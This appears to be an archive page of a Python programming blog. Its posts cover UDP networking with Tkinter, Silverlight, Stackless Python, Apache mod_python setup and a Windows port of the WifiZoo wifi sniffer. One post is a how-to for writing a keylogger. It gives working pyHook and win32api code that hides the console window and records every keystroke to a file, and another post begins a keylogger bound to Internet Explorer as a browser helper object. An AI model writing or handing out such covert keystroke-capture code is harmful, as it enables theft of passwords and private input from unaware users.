Archive for the ‘Python’ Category

Network Programming in Python and Graphics

In this Tutorial I will try and explain simple Networking concepts in Python. Some things you will learn here are GUI programming, Networking, threading and hopefully enough understanding to be able to send binary data over the network.

from Tkinter import *
import socket
from threading import *
import cPickle


Our import statements you will notice we import our GUI modules, our socket modules, threading for keeping the GUI from freezing during connections. Finally cPickle his allows to send binary data over the network

CMD_MSG, CMD_LINE = range(2)


create some global variables

first we define our server function assign a port to listen to and bind it to our IP address


def server():
port = 9000
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((socket.gethostbyname(socket.gethostname()), int(port))) # bind to ip


next we create our loop
Read the rest of this entry »

So on one of my many journey’s across the internet I decided I wanted to create a Keylogger and bind it to the IE 6 Browser using a BHO (Browser Helper Objects)

this involved some interesting feats I will share here what I came up with. I decided I wanted to use python for this task as it was and still is rather rare to accomplish this

First I came across this code amply named bho_skel.py


import sys
import _winreg

from ctypes import *
from ctypes.com import IUnknown, PIUnknown, REFIID, GUID, STDMETHOD, HRESULT, \
COMObject
from ctypes.com.automation import IDispatch, BSTR, VARIANT, \
dispinterface, DISPMETHOD
from ctypes.com.register import Registrar
from ctypes.com.connectionpoints import dispinterface_EventReceiver, \
GetConnectionPoint

import ie6 # module generated by ctypes/com/tools/readtlb.py

# _Logger is pinched from ctypes 0.6.2
# ——————————————————————–
from ctypes import windll
kernel32 = windll.kernel32

Read the rest of this entry »

To start there are some prerequisites you need to download in order to do this effectively.  Download Stackless Python 2.5.2


http://www.stackless.com


Download win32 by Mark hammond

http://python.net/crew/mhammond/


Should then work  by running python NetworkOSwatching.py from command line.  In order to run this from Binary
please make sure you have Windows Vista with SP1 Some problems have been reported running on XP SP2.
If you would like to compile a binary for XP that would be appreciated to

This is a server written in Python

[1] Connect via Putty on target computer using Raw connection port 8888. Example “127.0.0.1″ 8888 Raw
[2] After successful connection enter command “START” With out the quotes
[3] Watch for recursive file system changes

This app uses stackless for threads


Here is a binary and source download…

http://www.techshinobi.com/NetworkOSWatching.zip


To change top level directory modify

path_to_watch = “C:\\”

to anything you choose

example

path_to_watch = os.getcwd()

The Source

Read the rest of this entry »

I’ve been playing with Microsoft Silverlight and would like to share how to use it. First what is Microsoft Silverlight?

Microsoft Silverlight is a programmable web browser plugin that enables features such as animation, vector graphics and audio-video playback that characterizes rich Internet applications

Currently in Version 2 and Version 3 is in Beta. Version 2 brought with it the use of the Dynamic Language Runtime environment or DLR this allows for languages using .net to implement Silverlight Applications Such as C# VB.net Iron Python and Iron Ruby. To explain it better you can now use Python in your browser!

Silverlight uses XAML an XML based language developed by microsoft for use with silverlight

Extensible Application Markup Language, or XAML (pronounced “zammel”), is an XML-based markup language developed by Microsoft

Alright now that we know what Silverlight is we can start to use it. The examples I will be developing will be for IronPython 2.01

Read the rest of this entry »

How to Write a software Keylogger

According to wiki key loggers perform the following

Keystroke logging (often called keylogging) is a method of capturing and recording user keystrokes.

Although now a days you would also want to capture mouse events. I won’t be getting into mouse hooks in this tutorial. Some one else can do that if they like. The language I will use will be python obviously not the best choice but you can convert it into your desired language: C, Java or whatever.

My First example: A Module designed for this purpose:

A lot of languages will have key logging modules already available for use, python has one called PyHook. Here is an example of PyHook


import pythoncom, pyHook

# create a hook manager
hm = pyHook.HookManager()
# watch for all key events
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()


We import our modules then create a function and pass it an event parameter what this does is tell python an event should occur (in this case our keyboard input)

We then call our pyHook functions to listen for our keyboard input.

Wow a keylogger in about 8 – 20 lines of code

Next we can move on to win api

import win32api
import win32console
import win32gui
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)
try:
mylog_file = open("/HOME/output.txt","a")
except IOError:
print "Error grabbing file"
else:
while 1:
for i in range(32, 256):
keyit = win32api.GetAsyncKeyState(i)
if keyit == -32767:
keyEnd = 81
mylog_file.write(chr(i))
if i == keyEnd:
mylog_file.close()
keyin = open("/HOME/output.txt","r")
data = keyin.read()

Ok this is a bit more drastic code with some extras. If you don’t know what winapi is I suggest you read up on it. It will give you a lot of insight into coding

import necessary modules

import win32api
import win32console
import win32gui


we then hide the console window

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)


try and open a file for logging. Python tends to automagically create one if it’s not there

try:
mylog_file = open("/HOME/output.txt","a")
except IOError:
print "Error grabbing file"


get our range of Keys and call the winapi GetAsyncKeyState Function what this does according to microsoft

The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.


for i in range(32, 256):
keyit = win32api.GetAsyncKeyState(i)


If Shift Q is pressed log data to File


keyEnd = 81
mylog_file.write(chr(i))
if i == keyEnd:
mylog_file.close()
keyin = open("/HOME/output.txt","r")
data = keyin.read()


Alright that wasn’t so bad was it

This is just code to be a starting point I do not say these ways are the best or only ways its more or less meant as a very basic introduction to coding keyloggers

Next article (Sending keystrokes over the network)

By Maboroshi

Resources

Wiki http://en.wikipedia.org/wiki/Keystroke_logging
PyHook http://pyhook.wiki.sourceforge.net/
GetAsyncKeyState http://msdn.microsoft.com/en-us/library/ms646293(VS.85).aspx

Recently while perusing around the net looking at stuff to try to find a solution to a roadblock for a game I’m designing Ive found some interesting stuff I thought I would share with you.  The first one I would like to introduce to you is Stackless Python.

Stackless Python is what you want to use if you program in Python and you want to take advantage of multi-threading technology.  Take a look a the game Eve-Online for example, that game was built on Stackless Python and eventually they did some modifications and enhancements to a network layer with it(pretty sure it was network layer) and dubbed it StacklessIO,   this boosted the games performance to sweet ass levels…to date I have found no code examples of StacklessIO. Please share if you know any resources.  If you want to know more about Stackless Python check out the official website at www.stackless.com

here are some simple examples of Stackless (HTTPServer, RPC, MUD Server, Chat Server)

http://code.google.com/p/stacklessexamples/wiki/StacklessNetworking

The next thing I want to share with you is a small series of articles from IBM on Massively Multiplayer Online (MMO) server architecture.  This series is a great resource on the foundations of MMO with easy to follow examples check em out:

http://www.ibm.com/developerworks/library/ar-powerup1/

http://www.ibm.com/developerworks/library/ar-powerup2/

Step 1# Download and install Apache

Download Apache for windows from here http://apache.mirror.rafal.ca/httpd/binaries/win32/apache_2.2.11-win32-x86-openssl-0.9.8i.msi latest version is 2.2.11 you can find a mirror closer to you if you like from here (http://httpd.apache.org/download.cg)

Install it to C:\Apache2\
when you install it you will get a prompt for server information enter these

Network Domain: localhost
Server Name: localhost
Admin Email: (your any email)

Step 2# Configure Apache

Open up the Apache configuration file generally found in your start menu Find the line DocumentRoot and change it to a directory such as C:\public_html\

So DocumentRoot = “C:\public_html”

A few lines down you will find another line to change change this to

Now find the line DirectoryIndex and add index.psp at the end

Step 3# Mod Python

Download Mod Python from http://apache.sunsite.ualberta.ca/httpd/modpython/win/3.3.1/

Install it. It should find your Python install you may need to also give it the directory for Apache when it prompts you

Step 4# Configure Apache for Mod Python

Open up your Apache Configuration file once again and add these lines at the bottom (the very end of the file)

LoadModule python_module modules/mod_python.so
AddHandler mod_python .psp .psp_
PythonHandler mod_python.psp
PythonDebug On

Reboot Apache (troubleshoot)

Hello I don’t know how many of you are familiar with scapy (see http://www.secdev.org/projects/scapy/) There is a windows port which Zack Payton Dirk Loss and others had done

Today I am bringing WifiZoo to Windows using the Scapy Windows Port.

What is Wifizoo you ask? Taken from their website here is a description.

WifiZoo is a tool to gather wifi information passively. I wanted to do something wifi-related somewhat helpful in wifi pentesting and I did this to have fun after I discovered ‘Ferret’ from Errata Security. I know neither Ferret or WifiZoo do anything spectacular, but I thought that the idea was fun/useful anyways.

I basically wanted something that I could run, by itself, to get info from open wifi networks (and possibly encrypted ones in the future, at least with WEP ) without joining any network, and covering all wifi channels, and this is what I came up with so far. Its written in python, I can modify it easily, and it fulfills a not-very-ambitious purpose. Kudos to scapy for doing pretty much all the packet parsing for me (scapy is great).

Ok now onto the source Imagery and links

The source was pretty straight forward to change I won’t explain my secrets

but here it is running on eth0

import thing here is to “cd” to the directory where wifizoo.py is located this is important for viewing the wifizoo web interface as I found out ( at least on my system it would not dipslay unless running from the same directory )

Like I said this is still beta and working out the bugs so I won’t post the source today

here is the web interface

Ok I will explain what I have changed in the source so far to make this work

appHandlers.py
- import curses.ascii
+ #import curses.ascii

wifiglobals.py
- import curses.ascii
+ #import curses.ascii

- if curses.ascii.isctrl(c):
+ #if curses.ascii.isctrl(c):

+ if ord(c) >= 0 and ord(c) <=31:

wifizoo.py
- import curses.ascii
+ #import curses.ascii

also changing conf.eth = “auth0s” # or whatever to your intreface

anyway thats not to exciting and its not 100 % yet we will see if it succeeds

Cheers

Maboroshi